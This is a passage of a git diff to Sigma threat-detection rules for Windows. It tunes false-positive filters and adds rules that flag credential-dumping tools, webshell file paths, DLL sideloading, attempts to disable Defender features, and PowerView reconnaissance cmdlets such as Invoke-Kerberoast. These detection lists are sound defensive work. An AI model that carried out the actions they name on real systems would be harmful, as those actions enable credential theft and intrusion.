Kheirkhabarov, oscd.community references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment date: 2019/11/01 -modified: 2022/01/11 +modified: 2022/09/21 logsource: category: file_event product: windows @@ -38,6 +38,7 @@ detection: - '\servpw64.exe' - '\pwdump.exe' - '\procdump64.exe' + - '\Dumpy.exe' condition: selection falsepositives: - Legitimate Administrator using tool for password recovery diff --git a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml index 96e397ca5..d684b222a 100644 --- a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -6,7 +6,7 @@ author: Nasreddine Bencherchali references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ date: 2022/06/10 -modified: 2022/06/21 +modified: 2022/09/20 logsource: product: windows category: file_event @@ -20,7 +20,9 @@ detection: # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: 'C:\Users\' Image|contains: '\AppData\Local\Temp\' - Image|endswith: '\target.exe' + Image|endswith: + - '\target.exe' + - 'Installer.x64.exe' condition: selection and not 1 of filter* falsepositives: - Possible FPs during first installation of Notepad++ diff --git a/rules/windows/file_event/file_event_win_ripzip_attack.yml b/rules/windows/file_event/file_event_win_ripzip_attack.yml index 7f71a7886..78039d23b 100644 --- a/rules/windows/file_event/file_event_win_ripzip_attack.yml +++ b/rules/windows/file_event/file_event_win_ripzip_attack.yml @@ -15,7 +15,7 @@ logsource: product: windows detection: selection: # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\target.lnk - TargetFileName|contains|all: + TargetFilename|contains|all: - '\Microsoft\Windows\Start Menu\Programs\Startup' - '.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}' Image|endswith: '\explorer.exe' diff --git a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml index 3dbda7a44..3ac6496fb 100755 --- a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml +++ b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml @@ -4,25 +4,28 @@ status: test description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) references: - - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ + - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ date: 2020/03/19 -modified: 2021/12/03 +modified: 2022/09/20 logsource: - product: windows - category: file_event + product: windows + category: file_event detection: - selection: - TargetFilename|endswith: '\desktop.ini' - filter: - Image|startswith: - - 'C:\Windows\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + TargetFilename|endswith: '\desktop.ini' + filter_generic: + Image|startswith: + - 'C:\Windows\' + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + filter_jetbrains: + Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe' + TargetFilename|contains: '\JetBrains\apps\' + condition: selection and not 1 of filter_* falsepositives: - - Operations performed through Windows SCCM or equivalent - - Read only access list authority + - Operations performed through Windows SCCM or equivalent + - Read only access list authority level: medium tags: - - attack.persistence - - attack.t1547.009 + - attack.persistence + - attack.t1547.009 diff --git a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml index 8d6fd06ce..bc6e34bd4 100644 --- a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml +++ b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml @@ -14,11 +14,11 @@ logsource: category: file_event detection: selection1: - TargetFilename|endswith: + TargetFilename|endswith: - '\TeamViewer\RemotePrinting\tvprint.db' - '\TeamViewer\TVNetwork.log' selection2: - TargetFilename|contains|all: + TargetFilename|contains|all: - '\TeamViewer' - '_Logfile.log' condition: 1 of selection* diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index eda1ef802..5d246108f 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -6,37 +6,34 @@ author: Beyu Denis, oscd.community, Tim Shelton references: - PT ESC rule and personal experience date: 2019/10/22 -modified: 2022/05/24 +modified: 2022/09/18 logsource: product: windows category: file_event detection: - selection_2: + selection_wwwroot: TargetFilename|contains: '\inetpub\wwwroot\' - selection_3: + selection_ext1: TargetFilename|contains: - '.asp' - '.ashx' - '.ph' - selection_4: + selection_static: TargetFilename|contains: - '\www\' - '\htdocs\' - '\html\' - selection_5: + selection_ext2: TargetFilename|contains: '.ph' - selection_6: - - TargetFilename|endswith: '.jsp' - - TargetFilename|contains|all: - - '\cgi-bin\' - - '.pl' false_positive1: # false positives when unpacking some executables in $TEMP TargetFilename|contains: - '\AppData\Local\Temp\' - '\Windows\Temp\' - false_positive2: + false_positive_system: Image: 'System' # fp : backup/restore from drivers - condition: not false_positive2 and ( (selection_2 and selection_3 and not false_positive1) or (selection_4 and selection_5 and not false_positive1) or (selection_6 and not false_positive1) ) + false_positive_legitimate: + TargetFilename|contains: '\xampp' + condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder level: high diff --git a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml index b7ed4cd61..7747fcde6 100644 --- a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml +++ b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml @@ -18,7 +18,7 @@ detection: Image|endswith: - '\rundll32.exe' #- '\svchost.exe' # Might generate some FP - - '\dllhost.exe' + #- '\dllhost.exe' # Too many FPs - '\smss.exe' - '\RuntimeBroker.exe' - '\sihost.exe' diff --git a/rules/windows/file_rename/file_rename_win_ransomware.yml b/rules/windows/file_rename/file_rename_win_ransomware.yml index 72d05ff25..3926f3b6e 100644 --- a/rules/windows/file_rename/file_rename_win_ransomware.yml +++ b/rules/windows/file_rename/file_rename_win_ransomware.yml @@ -7,7 +7,7 @@ references: - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ author: frack113 date: 2022/07/16 -modified: 2022/08/31 +modified: 2022/09/20 tags: - attack.impact - attack.t1486 @@ -26,7 +26,7 @@ detection: - '.jpeg' - '.png' - '.pdf' - TargetFilename|contains: + TargetFilename|contains: - '.lnk.' - '.rtf.' - '.pst.' @@ -36,7 +36,7 @@ detection: - '.jpeg.' - '.png.' - '.pdf.' - filter: + filter_generic: TargetFilename|endswith: - '.tmp' - '.bak' @@ -44,7 +44,10 @@ detection: - '.orig' - '.backup' - '.temp' - condition: selection and not filter + filter_anaconda: + TargetFilename|startswith: 'C:\ProgramData\Anaconda3\' + TargetFilename|endswith: '.c~' + condition: selection and not 1 of filter_* falsepositives: - Backup software level: medium diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index fd929f098..ce7c17e00 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -6,6 +6,7 @@ references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali, Wietze Beukema (project and research) date: 2022/08/17 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.persistence @@ -19,10 +20,13 @@ detection: # Bitdefender selection_bitdefender: ImageLoaded|endswith: '\log.dll' - filter_bitdefender: + filter_log_dll_bitdefender: ImageLoaded|startswith: - 'C:\Program Files\Bitdefender Antivirus Free\' - 'C:\Program Files (x86)\Bitdefender Antivirus Free\' + filter_log_dll_other: + - ImageLoaded: 'C:\Program Files\Dell\SARemediation\plugin\log.dll' + - ImageLoaded|startswith: 'C:\Program Files\Canon\MyPrinter\' # F-Secure selection_fsecure: ImageLoaded|endswith: '\qrt.dll' @@ -40,7 +44,9 @@ detection: ImageLoaded|startswith: - 'C:\Program Files\McAfee\' - 'C:\Program Files (x86)\McAfee\' - condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) + condition: (selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - - Unknown + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..53f7ec255 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -8,7 +8,7 @@ references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex) date: 2022/08/14 -modified: 2022/09/11 +modified: 2022/09/27 tags: - attack.defense_evasion - attack.persistence @@ -416,11 +416,15 @@ detection: - 'C:\Windows\SysWOW64\' - 'C:\Windows\WinSxS\' - 'C:\Windows\SoftwareDistribution\' - filter_systemp: - ImageLoaded|startswith: 'C:\Windows\SystemTemp\' + - 'C:\Windows\SystemTemp\' filter_appvpolicy: - ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll - Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + ImageLoaded: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll' + Image: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe' + filter_azure: + ImageLoaded|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + filter_dell: + Image: 'C:\Windows\System32\backgroundTaskHost.exe' + ImageLoaded|startswith: 'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml index c3d02ecdd..36d307d82 100755 --- a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml @@ -8,7 +8,7 @@ references: - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 date: 2019/10/27 -modified: 2022/08/09 +modified: 2022/09/15 logsource: category: image_load product: windows @@ -35,7 +35,7 @@ detection: - '\cscript.exe' - '\mshta.exe' # - '\regsvr32.exe' triggered by installing common software - - '\schtasks.exe' + # - '\schtasks.exe' triggered by installing software - '\dnx.exe' - '\regsvcs.exe' - '\sc.exe' diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 79b4ceff8..9b071a802 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml @@ -3,29 +3,31 @@ id: cbb56d62-4060-40f7-9466-d8aaf3123f83 description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. status: experimental date: 2020/05/03 -modified: 2021/12/05 +modified: 2022/09/21 author: Patrick St. John, OTR (Open Threat Research) tags: - - attack.defense_evasion - - attack.t1027.002 + - attack.defense_evasion + - attack.t1027.002 references: - - https://www.py2exe.org/ - - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ + - https://www.py2exe.org/ + - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ logsource: - product: windows - category: image_load + product: windows + category: image_load detection: - selection: - Description: 'Python Core' - filter: - - Image|contains: - - 'Python' # FPs with python38.dll, python.exe etc. - - Image|startswith: - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + Description: 'Python Core' + filter: + - Image|contains: + - 'Python' # FPs with python38.dll, python.exe etc. + - Image|startswith: + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + - 'C:\ProgramData\Anaconda3\' # Comment out if you don't use Anaconda in your environment + condition: selection and not filter fields: - - Description + - Description falsepositives: - - Legit Py2Exe Binaries -level: medium \ No newline at end of file + - Legitimate Py2Exe Binaries + - Known false positive caused with Python Anaconda +level: medium diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index e82154a0b..eac2f40fa 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/08/13 +modified: 2022/09/21 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access @@ -27,18 +27,26 @@ detection: filter_start: Image|startswith: - 'C:\Windows\System32\' - - 'C:\Windows\explorer.exe' + - 'C:\Windows\SysWOW64\' - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: - Image|endswith: '\opera_autoupdate.exe' + Image|endswith: + - '\opera_autoupdate.exe' + - '\procexp64.exe' + - '\procexp.exe' filter_full: - Image: 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + Image: + - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + - 'C:\Windows\explorer.exe' filter_user: Image|startswith: 'C:\Users\' - Image|endswith: '\AppData\Roaming\Spotify\Spotify.exe' - filter_path: - Image|contains: '\Local\Microsoft\OneDrive\' + Image|endswith: + - '\AppData\Roaming\Spotify\Spotify.exe' + - '\AppData\Local\Microsoft\Teams\current\Teams.exe' + filter_contains: + Image|startswith: 'C:\Users\' + Image|contains: '\AppData\Local\Microsoft\OneDrive\' condition: selection and not 1 of filter_* falsepositives: - Other legitimate processes loading those DLLs in your environment. diff --git a/rules/windows/image_load/image_load_wsman_provider_image_load.yml b/rules/windows/image_load/image_load_wsman_provider_image_load.yml index 1ce9ae1f7..846ebbbbb 100644 --- a/rules/windows/image_load/image_load_wsman_provider_image_load.yml +++ b/rules/windows/image_load/image_load_wsman_provider_image_load.yml @@ -3,7 +3,7 @@ id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. status: experimental date: 2020/06/24 -modified: 2022/07/18 +modified: 2022/09/18 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -55,6 +55,8 @@ detection: Image|startswith: 'C:\Windows\Temp\asgard2-agent\' filter_citrix: Image|startswith: 'C:\Program Files\Citrix\' + filter_ps_ise: + Image|endswith: '\powershell_ise.exe' svchost: Image|endswith: '\svchost.exe' commandline_null: diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 5e0ec8245..bebc55259 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python - https://pypi.org/project/scapy/ date: 2021/12/10 -modified: 2022/08/12 +modified: 2022/09/20 logsource: category: network_connection product: windows @@ -15,7 +15,23 @@ detection: selection: Initiated: 'true' Image|contains: python - condition: selection + filter_conda: + # Related to anaconda updates. Command example: "conda update conda" + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\conda-script.py' + - 'update' + filter_conda_jupyter_notebook: + # Related to anaconda opening an instance of Jupyter Notebook + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\python.exe + CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + filter_local_communication: + # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + DestinationIp: 127.0.0.1 + SourceIp: 127.0.0.1 + condition: selection and not 1 of filter_* falsepositives: - Legitimate python script level: medium diff --git a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml index 89a6e4bf1..7612f4a7b 100644 --- a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml +++ b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml @@ -9,7 +9,7 @@ references: - https://www.ietf.org/rfc/rfc2821.txt author: frack113 date: 2022/01/07 -modified: 2022/02/16 +modified: 2022/09/21 logsource: category: network_connection product: windows @@ -27,7 +27,10 @@ detection: - \outlook.exe filter_mailserver: Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\' - condition: selection and not 1 of filter* + filter_outlook: + Image|startswith: 'C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_' + Image|endswith: '\HxTsr.exe' + condition: selection and not 1 of filter_* falsepositives: - Other SMTP tools level: medium diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml index 2c87f50da..0df871e90 100755 --- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml @@ -4,36 +4,36 @@ status: test description: Detects programs with network connections running in suspicious files system locations author: Florian Roth, Tim Shelton references: - - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo + - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo date: 2017/03/19 modified: 2022/05/26 logsource: - category: network_connection - product: windows - definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' + category: network_connection + product: windows + definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' detection: - selection: - - Image|contains: + selection: + - Image|contains: # - '\ProgramData\' # too many false positives, e.g. with Webex for Windows - - '\Users\All Users\' - - '\Users\Default\' - - '\Users\Public\' - - '\Users\Contacts\' - - '\Users\Searches\' - - '\config\systemprofile\' - - '\Windows\Fonts\' - - '\Windows\IME\' - - '\Windows\addins\' - - Image|endswith: - - '\$Recycle.bin' - - Image|startswith: - - 'C:\Perflogs\' - false_positive1: - Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location - condition: selection and not 1 of false_positive* + - '\Users\All Users\' + - '\Users\Default\' + - '\Users\Public\' + - '\Users\Contacts\' + - '\Users\Searches\' + - '\config\systemprofile\' + - '\Windows\Fonts\' + - '\Windows\IME\' + - '\Windows\addins\' + - Image|endswith: + - '\$Recycle.bin' + - Image|startswith: + - 'C:\Perflogs\' + false_positive1: + Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location + condition: selection and not 1 of false_positive* falsepositives: - - Unknown + - Unknown level: high tags: - - attack.command_and_control - - attack.t1105 + - attack.command_and_control + - attack.t1105 diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml index 5a47a8919..3677db9fd 100644 --- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml @@ -56,5 +56,5 @@ detection: - '\MsFteWds' condition: 1 of selection_malleable_profile* and not filter falsepositives: - - Chrome instances using the exactly same name pipe named mojo.something + - Chrome instances using the exact same pipe name "mojo.something" level: high diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..3f7989312 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -3,10 +3,10 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/04/21 +modified: 2022/09/20 author: Roberto Rodriguez @Cyb3rWard0g references: - - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html + - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html tags: - attack.execution - attack.t1059.001 @@ -25,9 +25,13 @@ detection: ContextInfo|contains: 'C:\Windows\system32\dsac.exe' filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' + filter_help_update: + Payload|contains: + - 'Update-Help' + - 'Failed to update Help for the module' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter - MSP Detection Searcher - Citrix ConfigSync.ps1 -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml new file mode 100644 index 000000000..6acd74a7f --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -0,0 +1,26 @@ +title: Powershell Add Name Resolution Policy Table Rule +id: 4368354e-1797-463c-bc39-a309effbe8d7 +status: experimental +description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. +references: + - https://twitter.com/NathanMcNulty/status/1569497348841287681 + - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps +author: Borna Talebi +date: 2021/09/14 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + selection: + ScriptBlockText|contains|all: + - 'Add-DnsClientNrptRule' + - '-Namesp' + - '-NameSe' + condition: selection +tags: + - attack.impact + - attack.t1565 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml new file mode 100644 index 000000000..df3121e56 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -0,0 +1,36 @@ +title: Disable-WindowsOptionalFeature Command PowerShell +id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md + - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Disable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any important windows features + ScriptBlockText|contains: + - 'Windows-Defender-Gui' + - 'Windows-Defender-Features' + - 'Windows-Defender' + - 'Windows-Defender-ApplicationGuard' + #- 'Containers-DisposableClientVM' # Windows Sandbox + condition: all of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml new file mode 100644 index 000000000..c37b1dd75 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml @@ -0,0 +1,33 @@ +title: Enable-WindowsOptionalFeature Command PowerShell +id: 55c925c1-7195-426b-a136-a9396800e29b +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Enable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any unsecure windows features + ScriptBlockText|contains: + - 'TelnetServer' + - 'Internet-Explorer-Optional-amd64' + - 'TFTP' + - 'SMB1Protocol' + condition: all of selection* +falsepositives: + - Unknown +level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 332337938..12701d630 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml @@ -18,131 +18,131 @@ logsource: category: ps_script definition: Script Block Logging must be enabled detection: - selection: - ScriptBlockText|contains: - - Export-PowerViewCSV - - Get-IPAddress - - Resolve-IPAddress - - Convert-NameToSid - - ConvertTo-SID - - Convert-ADName - - ConvertFrom-UACValue - - Add-RemoteConnection - - Remove-RemoteConnection - - Invoke-UserImpersonation - - Invoke-RevertToSelf - - Request-SPNTicket - - Get-DomainSPNTicket - - Invoke-Kerberoast - - Get-PathAcl - - Get-DNSZone - - Get-DomainDNSZone - - Get-DNSRecord - - Get-DomainDNSRecord - - Get-NetDomain - - Get-Domain - - Get-NetDomainController - - Get-DomainController - - Get-NetForest - - Get-Forest - - Get-NetForestDomain - - Get-ForestDomain - - Get-NetForestCatalog - - Get-ForestGlobalCatalog - - Find-DomainObjectPropertyOutlier - - Get-NetUser - - Get-DomainUser - - New-DomainUser - - Set-DomainUserPassword - - Get-UserEvent - - Get-DomainUserEvent - - Get-NetComputer - - Get-DomainComputer - - Get-ADObject - - Get-DomainObject - - Set-ADObject - - Set-DomainObject - - Get-ObjectAcl - - Get-DomainObjectAcl - - Add-ObjectAcl - - Add-DomainObjectAcl - - Invoke-ACLScanner - - Find-InterestingDomainAcl - - Get-NetOU - - Get-DomainOU - - Get-NetSite - - Get-DomainSite - - Get-NetSubnet - - Get-DomainSubnet - - Get-DomainSID - - Get-NetGroup - - Get-DomainGroup - - New-DomainGroup - - Find-ManagedSecurityGroups - - Get-DomainManagedSecurityGroup - - Get-NetGroupMember - - Get-DomainGroupMember - - Add-DomainGroupMember - - Get-NetFileServer - - Get-DomainFileServer - - Get-DFSshare - - Get-DomainDFSShare - - Get-NetGPO - - Get-DomainGPO - - Get-NetGPOGroup - - Get-DomainGPOLocalGroup - - Find-GPOLocation - - Get-DomainGPOUserLocalGroupMapping - - Find-GPOComputerAdmin - - Get-DomainGPOComputerLocalGroupMapping - - Get-DomainPolicy - - Get-NetLocalGroup - - Get-NetLocalGroupMember - - Get-NetShare - - Get-NetLoggedon - - Get-NetSession - - Get-LoggedOnLocal - - Get-RegLoggedOn - - Get-NetRDPSession - - Invoke-CheckLocalAdminAccess - - Test-AdminAccess - - Get-SiteName - - Get-NetComputerSiteName - - Get-Proxy - - Get-WMIRegProxy - - Get-LastLoggedOn - - Get-WMIRegLastLoggedOn - - Get-CachedRDPConnection - - Get-WMIRegCachedRDPConnection - - Get-RegistryMountedDrive - - Get-WMIRegMountedDrive - - Get-NetProcess - - Get-WMIProcess - - Find-InterestingFile - - Invoke-UserHunter - - Find-DomainUserLocation - - Invoke-ProcessHunter - - Find-DomainProcess - - Invoke-EventHunter - - Find-DomainUserEvent - - Invoke-ShareFinder - - Find-DomainShare - - Invoke-FileFinder - - Find-InterestingDomainShareFile - - Find-LocalAdminAccess - - Invoke-EnumerateLocalAdmin - - Find-DomainLocalGroupMember - - Get-NetDomainTrust - - Get-DomainTrust - - Get-NetForestTrust - - Get-ForestTrust - - Find-ForeignUser - - Get-DomainForeignUser - - Find-ForeignGroup - - Get-DomainForeignGroupMember - - Invoke-MapDomainTrust - - Get-DomainTrustMapping - condition: selection + selection: + ScriptBlockText|contains: + - Export-PowerViewCSV + - Get-IPAddress + - Resolve-IPAddress + - Convert-NameToSid + - ConvertTo-SID + - Convert-ADName + - ConvertFrom-UACValue + - Add-RemoteConnection + - Remove-RemoteConnection + - Invoke-UserImpersonation + - Invoke-RevertToSelf + - 